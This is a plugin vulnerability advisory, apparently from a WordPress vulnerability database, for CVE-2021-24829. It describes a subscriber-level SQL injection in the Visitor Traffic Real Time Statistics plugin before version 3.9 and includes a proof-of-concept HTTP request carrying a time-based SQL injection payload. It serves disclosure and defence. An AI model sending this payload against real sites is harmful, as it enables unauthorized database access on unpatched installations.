Visitor Traffic Real Time Statistics < 3.9 – Subscriber+ SQL Injection | CVE 2021-24829 | Plugin Vulnerabilities

Description

The plugin does not validate and escape user input passed to the today_traffic_index AJAX action (available to any authenticated users) before using it in a SQL statement, leading to an SQL injection issue

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 129
Connection: close
Cookie: [subscriber+]

action=today_traffic_index&start=0&length=1+procedure+analyse(updatexml(rand(),concat(0x3a,benchmark(30000000,sha1(1))),0x20),1);

Affects Plugins

visitors-traffic-real-time-statistics

Fixed in 3.9

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

ZhongFu Su(JrXnm) of Wuhan University

Submitter

ZhongFu Su(JrXnm) of Wuhan University

Submitter website

https://blog.szfszf.top

Verified

Yes

WPVDB ID

cc6585c8-5798-48a1-89f7-a3337f56df3f

Timeline

Publicly Published

2021-10-06 (about 4 years ago)

Added

2021-10-06 (about 4 years ago)

Last Updated

2022-09-26 (about 3 years ago)

Other

Published

Title

Published

2025-12-11

Title

Media Library Tools < 1.7.0 - Authenticated (Author+) SQL Injection

Published

2023-04-17

Title

NEX-Forms < 8.4 - Admin+ SQL Injection

Published

2025-01-07

Title

Google Maps Travel Route <= 1.3.1 - Authenticated (Subscriber+) SQL Injection

Published

2022-04-25

Title

ARPrice Lite < 3.6.1 - Unauthenticated SQLi

Published

2025-06-24

Title

Homey <= 2.4.5 - Unauthenticated SQL Injection